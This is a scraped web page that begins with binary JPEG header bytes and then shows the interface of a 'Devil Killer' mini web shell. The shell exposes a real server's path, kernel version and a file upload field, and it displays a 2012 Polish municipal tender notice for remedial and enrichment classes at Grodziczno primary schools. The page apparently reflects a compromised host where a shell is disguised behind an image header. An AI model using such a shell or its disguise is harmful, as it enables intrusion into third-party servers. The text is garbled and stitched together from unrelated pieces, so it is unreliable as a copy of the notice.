JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120806/286246-N-2012.html

<p class="kh_header"><b>Grodziczno: Przeprowadzenie zajęć dydaktyczno-wyrównawczych, rozwijających uzdolnienia i specjalistycznych dla uczestników projektu Indywidualizacja nauczania szansą dla dzieci  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji o</b><br>
<b>Numer ogłoszenia: 286246 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodziczno , Grodziczno 17A, 13-324 Grodziczno, woj. warmińsko-mazurskie, tel. 056 4729126, faks 056 4729106.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grodziczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć dydaktyczno-wyrównawczych, rozwijających uzdolnienia i specjalistycznych dla uczestników projektu Indywidualizacja nauczania szansą dla dzieci  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji o.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi edukacyjnej obejmującej przeprowadzenie zajęć dydaktyczno-wyrównawczych, rozwijających uzdolnienia i specjalistycznych dla uczestników projektu  Indywidualizacja nauczania szansą dla dzieci współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 
2.	Zajęcia realizowane będą dla uczniów z klas od I do III szkoły podstawowej w Szkole Podstawowej w Zwiniarzu, Zwiniarz 4a, 13 - 324 Grodziczno;  w Szkole Podstawowej w Montowie, Montowo 29d, 13 - 324 Grodziczno; w Szkole Podstawowej w Zajączkowie, Zajączkowo 21a, 13 - 324 Grodziczno; w Szkole Podstawowej w Boleszynie, Boleszyn 12b, 13 - 324 Grodziczno; w Zespole Szkół w Nowym Grodzicznie,  Nowe Grodziczno 83, 13 - 324 Grodziczno; w Zespole Szkół w Mrocznie, Mroczno 22a, 13 - 324 Grodziczno - dla  których  organem  prowadzącym  jest  Zamawiający -  Gmina  Grodziczno,  w  roku szkolnym 2012/2013.
3.	W ramach zamówienia realizowane będą następujące rodzaje zajęć:  
1)	Zajęcia dla uczniów z trudnościami w czytaniu i pisaniu, 
2)	Zajęcia dla uczniów z trudnościami w zdobyciu umiejętności matematycznych,
3)	Zajęcia logopedyczne,
4)	Gimnastyka korekcyjna,
5)	Zajęcia rozwijające zainteresowania plastyczne,
6)	Zajęcia rozwijające zainteresowania polonistyczne,
7)	Zajęcia rozwijające zainteresowania matematyczno - przyrodnicze,
8)	Zajęcia psychoedukacyjne dla uczniów z zaburzeniami komunikacji społecznej,
9)	Zajęcia specjalistyczne w pracy z komputerem,
10)	Zajęcia podnoszące umiejętności z języka angielskiego,
4.	Zajęcia i konsultacje będą odbywały się po obowiązkowych zajęciach lekcyjnych w godzinach dostosowanych do  wymogów  uczniów  i  warunków  szkoły  według  planu  pracy  opracowanego  przez  Wykonawcę  i zaakceptowanego przez Zamawiającego, 
5.	Zajęcia  realizowane  będą  zgodnie  z  Rozporządzeniem  Ministra  Edukacji  Narodowej  z  dnia  17  listopada 2010r,  w  sprawie  zasad  udzielania  i  organizacji  pomocy  psychologiczno  pedagogicznej  w  publicznych przedszkolach, szkołach i placówkach (Dz. U. nr 228 poz. 1487),
6.	Wykonawca usługi odpowiadał będzie za przygotowanie, realizację i dokumentację zajęć dodatkowych (miesięczny raport pracy,  dzienniki  zajęć),  sporządzanie  miesięcznych  zestawień  monitoringowych  wg wzoru określonego przez Zamawiającego,
7.	Zamawiający dopuszcza składanie ofert częściowych. 
8.	Zamówienie obejmuje 34 części, zgodnie z podanym wykazem: 
Część 1:  zajęcia dla uczniów z trudnościami w czytaniu i pisaniu dla uczniów klas I-III Szkoły Podstawowej w Zwiniarzu: 
- liczba godzin w całym okresie realizacji zamówienia: 90 godzin,
-  maksymalna liczba grup w ramach zajęć: 3 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób,
Część 2: zajęcia dla uczniów z trudnościami w czytaniu i pisaniu dla uczniów klas I-III Szkoły Podstawowej w Zajączkowie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć: 2 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób
Część 3: zajęcia dla uczniów z trudnościami w czytaniu i pisaniu dla uczniów klas I-III Szkoły Podstawowej w Boleszynie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć: 2 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób, 
Część 4: zajęcia dla uczniów z trudnościami w czytaniu i pisaniu dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Nowym Grodzicznie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć: 2 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób,
Część 5: zajęcia dla uczniów z trudnościami w czytaniu i pisaniu dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Mrocznie: 
- liczba godzin w całym okresie realizacji zamówienia: 90 godzin,
-  maksymalna liczba grup w ramach zajęć: 3 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób,
Część 6: zajęcia dla uczniów z trudnościami w zdobyciu umiejętności matematycznych dla uczniów klas I-III Szkoły Podstawowej w Zwiniarzu: 
- liczba godzin w całym okresie realizacji zamówienia: 90 godzin,
-  maksymalna liczba grup w ramach zajęć: 3 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób,
Część 7: zajęcia dla uczniów z trudnościami w zdobyciu umiejętności matematycznych dla uczniów klas I-III Szkoły Podstawowej w Montowie:
- liczba godzin w całym okresie realizacji zamówienia: 90 godzin,
-  maksymalna liczba grup w ramach zajęć: 3 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób,
Część 8: zajęcia dla uczniów z trudnościami w zdobyciu umiejętności matematycznych dla uczniów klas I-III Szkoły Podstawowej w Zajączkowie: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć: 1 grupa,
-  maksymalna liczba uczniów w jednej grupie:  8 osób,
Część 9: zajęcia dla uczniów z trudnościami w zdobyciu umiejętności matematycznych dla uczniów klas I-III Szkoły Podstawowej w Boleszynie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć: 2 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób,
Część 10: zajęcia dla uczniów z trudnościami w zdobyciu umiejętności matematycznych dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Mrocznie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć: 2 grupy,
-  maksymalna liczba uczniów w jednej grupie:  8 osób,
Część 11: zajęcia logopedyczne dla uczniów klas I-III Szkoły Podstawowej w Zwiniarzu: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 4 osoby,
Część 12: zajęcia logopedyczne dla uczniów klas I-III Szkoły Podstawowej w Zajączkowie:
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 4 osoby,
Część 13: zajęcia logopedyczne dla uczniów klas I-III Szkoły Podstawowej w Boleszynie: 
- liczba godzin w całym okresie realizacji zamówienia: 90 godzin,
-  maksymalna liczba grup w ramach zajęć:  3 grupy,
-  maksymalna liczba uczniów w jednej grupie: 4 osoby,
Część 14: zajęcia logopedyczne dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Mrocznie: 
- liczba godzin w całym okresie realizacji zamówienia: 120 godzin,
-  maksymalna liczba grup w ramach zajęć:  4 grupy,
-  maksymalna liczba uczniów w jednej grupie: 4 osoby,
Część 15: gimnastyka korekcyjna dla uczniów klas I-III Szkoły Podstawowej w Zwiniarzu: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 5 osób,
Część 16: gimnastyka korekcyjna dla uczniów klas I-III Szkoły Podstawowej w Montowie:
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 5 osób,
Część 17: gimnastyka korekcyjna dla uczniów klas I-III Szkoły Podstawowej w Zajączkowie: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 5 osób,
Część 18: gimnastyka korekcyjna dla uczniów klas I-III Szkoły Podstawowej w Boleszynie: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 5 osób,
Część 19: zajęcia rozwijające zainteresowania plastyczne dla uczniów klas I-III Szkoły Podstawowej w Zwiniarzu: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 8 osób,
Część 20: zajęcia rozwijające zainteresowania plastyczne dla uczniów klas I-III Szkoły Podstawowej w Zajączkowie: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 8 osób
Część 21: zajęcia rozwijające zainteresowania plastyczne dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Mrocznie: 
- liczba godzin w całym okresie realizacji zamówienia: 90 godzin,
-  maksymalna liczba grup w ramach zajęć:  3 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób
Część 22: zajęcia rozwijające zainteresowania polonistyczne dla uczniów klas I-III Szkoły Podstawowej w Zwiniarzu: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 8 osób
Część 23: zajęcia rozwijające zainteresowania polonistyczne dla uczniów klas I-III Szkoły Podstawowej w Zajączkowie: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 8 osób,
Część 24: zajęcia rozwijające zainteresowania polonistyczne dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Nowym Grodzicznie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób,
Część 25: zajęcia rozwijające zainteresowania matematyczno - przyrodnicze dla uczniów klas I-III Szkoły Podstawowej w Montowie: 
- liczba godzin w całym okresie realizacji zamówienia: 90 godzin,
-  maksymalna liczba grup w ramach zajęć:  3 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób,
Część 26: zajęcia rozwijające zainteresowania matematyczno - przyrodnicze dla uczniów klas I-III Szkoły Podstawowej w Zajączkowie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób,
Część 27: zajęcia rozwijające zainteresowania matematyczno - przyrodnicze dla uczniów z klas I-III Szkoły Podstawowej w Boleszynie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób,
Część 28: zajęcia rozwijające zainteresowania matematyczno - przyrodnicze dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Nowym Grodzicznie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób
Część 29: zajęcia rozwijające zainteresowania matematyczno - przyrodnicze dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Mrocznie: 
- liczba godzin w całym okresie realizacji zamówienia: 90 godzin,
-  maksymalna liczba grup w ramach zajęć:  3 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób,
Część 30: zajęcia psychoedukacyjne dla uczniów z zaburzeniami komunikacji społecznej z klas I-III Szkoły Podstawowej w Zajączkowie: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 10 osób,
Część 31: zajęcia psychoedukacyjne dla uczniów z zaburzeniami komunikacji społecznej z klas I-III szkoły podstawowej w Zespole Szkół w Nowym Grodzicznie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 10 osób,
Część 32: zajęcia psychoedukacyjne dla uczniów z zaburzeniami komunikacji społecznej z klas I-III szkoły podstawowej w Zespole Szkół w Mrocznie: 
- liczba godzin w całym okresie realizacji zamówienia: 30 godzin,
-  maksymalna liczba grup w ramach zajęć:  1 grupa,
-  maksymalna liczba uczniów w jednej grupie: 10 osób,
Część 33: zajęcia specjalistyczne w pracy z komputerem dla uczniów klas I-III szkoły podstawowej w Zespole Szkół w Nowym Grodzicznie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób,
Część 34: zajęcia podnoszące umiejętności z języka angielskiego dla uczniów z klas I-III szkoły podstawowej w Zespole Szkół w Nowym Grodzicznie: 
- liczba godzin w całym okresie realizacji zamówienia: 60 godzin,
-  maksymalna liczba grup w ramach zajęć:  2 grupy,
-  maksymalna liczba uczniów w jednej grupie: 8 osób.
9.	Zamawiający dopuszcza złożenie ofert na jedną lub więcej części. 
10.	Jeżeli w SIWZ jest mowa o godzinie należy rozumieć:
1)	dla części od nr 1 do nr 10, części od nr 19 do nr 29 , części od nr 33 do nr 34  jako  45 minut (godzinę lekcyjną), 
2)	dla części od nr 11 do nr 18 i części od nr 30 do nr 32 jako 60 minut..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 34.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli oświadczy że spełnia warunki udziału w postępowaniu określone w trybie art. 22 ust 1. PZP. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli oświadczy że spełnia warunki udziału w postępowaniu określone w trybie art. 22 ust 1. PZP. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli oświadczy że spełnia warunki udziału w postępowaniu określone w trybie art. 22 ust 1. PZP. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli oświadczy że spełnia warunki udziału w postępowaniu określone w trybie art. 22 ust 1. PZP, a dodatkowo; 1) Wykaże się dysponowaniem osobami do wykonania zamówienia. Zamawiający uzna, że wykonawca spełnia ten warunek jeżeli sam posiada, lub dysponuje osobami posiadającymi kwalifikacje zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. nr 50 poz. 400 z póź. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli oświadczy że spełnia warunki udziału w postępowaniu określone w trybie art. 22 ust 1. PZP. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia) w oparciu o wyżej wymieniony dokument dołączony do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
